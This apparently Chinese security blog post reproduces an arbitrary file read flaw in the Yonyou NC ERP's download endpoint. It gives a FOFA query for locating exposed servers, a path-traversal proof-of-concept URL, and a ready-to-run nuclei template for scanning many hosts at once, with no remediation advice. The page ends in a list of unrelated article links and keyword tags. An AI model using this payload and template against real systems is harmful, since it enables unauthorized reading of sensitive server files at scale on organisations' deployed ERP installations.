用友NC_download文件读取漏洞

漏洞简介

用友NC的download文件存在任意文件读取漏洞，攻击者可以利用该漏洞读取服务器上的敏感文件。

漏洞复现

fofa语法:app="用友-UFIDA-NC"

POC：
/portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp

nuclei批量yaml文件

id: yonyouNC_download_fileread
info:
  name: 用友NC_download文件读取
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: fileread
requests:
  - raw:
      - |+
        GET /portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: word
        part: body
        words:
          - "response.addHeader"

本栏目推荐文章
• C++实现文件内查找字符串
• IDEA项目名称后面出现中括号，模块Modules的名子和文件夹名称不同，可以右键修改名称也可以在File->Project Structure 修改Modules的Name(快捷键ctrl+Shift+Alt+s)
• 和利时MACS6通过dat文件实现任意时间范围与测点的历史数据提取与科研分析
• 多项式定积分计算软件2025 64位WIN版下载Polynomial definite integral calculation software 2025 64 bit WIN version download
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 类模板分文件编写
• Linux文件IO之二 [补档-2023-07-21]
• Linux文件IO之一 [补偿-2023-07-21]
• 十行python代码实现文件去重，去除重复文件的脚本
• vim编辑器实现左边目录右边是文件内容

NC_download 漏洞 download 文件 NCnc_download漏洞download文件 nc_download 文件下载download_ftp漏洞download 漏洞download管理系统 文件 报表 漏洞download文件 用友nc-cloud漏洞getshell 漏洞 目录erp-nc erp 漏洞nc-cloud getshell cloud 文件 函数 后台download release download文件docker